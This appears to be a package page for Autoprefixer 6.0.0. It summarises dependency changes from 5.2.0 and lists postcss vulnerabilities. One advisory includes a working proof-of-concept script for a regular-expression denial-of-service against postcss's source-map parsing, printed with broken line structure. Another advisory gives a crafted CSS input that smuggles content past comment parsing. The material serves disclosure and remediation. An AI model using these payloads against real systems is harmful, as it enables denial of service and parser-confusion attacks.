Autoprefixer version 6.0.0 represents a significant update from version 5.2.0, boasting advancements that improve its functionality and overall developer experience. The core dependency, postcss, sees a major version bump from ~4.1.11 to ^5.0.4, indicating substantial changes and likely improved CSS parsing and manipulation capabilities at its base. The removal of the direct dependency on autoprefixer-core, replaced by this major PostCSS update, hints at a deeper integration with PostCSS's core features. A new dependency, caniuse-db, is introduced, suggesting a potential update to utilize more current browser compatibility data directly, resulting in more accurate prefixing. Including, browserslistdependency allows setting which browsers to support.
The update also refactors its development dependencies, dropping babel-core and gulp-babel, which were required for ES6 transpilation in the older version. With the elimination of the core library dependency, the package becomes a more straightforward extension of the PostCss ecosystem by utilizing num2fraction. It is important to note that the build tools show a need for newer compiler versions as well for development purposes. The release date difference of approximately three months reflects active development and the continuous pursuit of enhanced features and improved performance. Developers upgrading should be aware of the PostCSS version jump and any potential compatibility considerations with existing PostCSS plugins, while the updated browser compatibility data promises greater precision and up-to-date prefixes generation.
All the vulnerabilities related to the version 6.0.0 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.